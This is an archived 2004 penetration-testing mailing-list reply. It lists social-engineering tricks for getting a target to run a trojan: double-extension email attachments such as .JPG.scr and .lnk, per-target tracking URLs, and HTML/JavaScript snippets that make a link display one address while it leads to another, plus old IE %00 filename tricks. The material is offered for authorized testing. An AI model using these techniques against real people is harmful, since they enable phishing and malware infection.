Re: Social Engineering Website (URL obfuscation/hiding)

From: Martin Mačok (martin.macok_at_underground.cz)
Date: 01/10/04

  • Next message: n30: "Auditing / Logging"
    Date: Sat, 10 Jan 2004 08:59:16 +0100
    To: pen-test@securityfocus.com
    
    

    On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:

    > As a last note, we'd need to get people to go there. Making it look
    > legit would be good. (i.e. use the %00 IE exploit to make the URL
    > look like it's internal and make the site look like their own) Any
    > techniques or message styles you've used and had success with?

     - send the trojan code in an email attachment with a good old
       something.JPG.scr trick (if you can go to them, they don't have to
       go to you)
       - some content filters disallow .scr, so try .lnk also
     - send a link to the trojan file, in typical MS Outlook environment,
       they just have to click on it and select "Open"
       - use unique URL/file for each target (so you can track downloads
         and email forwards)

    URL obfuscation/hiding:

            <script language="JavaScript">
            <!--
            function changehref()
            {
               document.all("obj").href = "http://www.fakesite.com" ;
               return 1 ;
            }
            //-->
            </script>

            [snip]

            <a href="http://www.realsite.com/" id="obj"
            onclick="changehref();">www.fakesite.com</a>

    Similar trick:

            <a href="http://www.realsite.com"
            onmouseover="window.status=('http://www.fakesite.com/'); return
            true;">www.fakesite.com</a>

    Some more recent SCAM trick:

            <a
            href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">
            www.fakesite.com</a>

    Other MS IE trick (browser believes it's a HTML instead of EXE):
            
            http://server/file.exe?.html

    As you mention, MS IE's (and possibly some other browser's) %00 trick:
         
            README.TXT%00PROG.EXE in Content-disposition:
            (there are many different tricks with %00)

    See also:
    http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
    http://www.solutions.fi/iebug2

    -- 
             Martin Mačok                 http://underground.cz/
       martin.macok@underground.cz        http://Xtrmntr.org/ORBman/
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    

  • Next message: n30: "Auditing / Logging"

    Relevant Pages

    • Re: apple MSWord files
      ... >> A student has sent me a paper as an email attachment. ... ah, didn't know this trick: ... nature: MacBinary III data with surprising version number ... ISTR having luck with tools from the 'macutils' package. ...
      (Debian-User)
    • Re: virus
      ... Deactivate your antivirus software and open every email attachment in your ... spam folder should do the trick. ...
      (alt.os.windows-xp)
    • Re: Minus Autopilot (wes video)
      ... have to mess up. ... success based on the piece ... so it may suck but at least i can take a bit more credit for the suckness ... A question about the trick between 2:47-2:48 ...
      (rec.juggling)
    • Re: Minus Autopilot (wes video)
      ... have to mess up. ... success based on the piece ... so it may suck but at least i can take a bit more credit for the suckness ... A question about the trick between 2:47-2:48 ...
      (rec.juggling)
    • Re: Minus Autopilot (wes video)
      ... have to mess up. ... success based on the piece ... so it may suck but at least i can take a bit more credit for the suckness ... A question about the trick between 2:47-2:48 ...
      (rec.juggling)